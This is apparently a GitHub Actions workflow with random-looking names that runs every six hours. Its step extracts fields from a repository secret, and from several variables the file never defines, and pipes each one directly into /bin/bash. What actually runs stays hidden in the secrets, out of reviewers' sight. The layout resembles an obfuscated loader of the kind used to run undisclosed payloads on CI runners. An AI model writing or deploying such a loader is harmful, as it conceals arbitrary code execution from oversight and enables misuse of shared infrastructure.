name: tangyangzhong1987

on:
  workflow_dispatch:
  schedule:
    - cron: '38 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: tangyangzhong1987
        env:
          avduj9: ${{ secrets.avduj9 }}
        run: |
          echo $avduj9 | jq -r .y3039 | /bin/bash
          echo $n018 | jq -r .ch13014 | /bin/bash
          echo $rdlb8289 | jq -r .vo1 | /bin/bash
          echo $bnoxe73 | jq -r .fjyw81405 | /bin/bash
          echo $dj7791 | jq -r .mg5264 | /bin/bash
          echo $jdrwa65 | jq -r .er4 | /bin/bash
          echo $sr12 | jq -r .rsesg71 | /bin/bash
          echo $r50613 | jq -r .yt0567 | /bin/bash

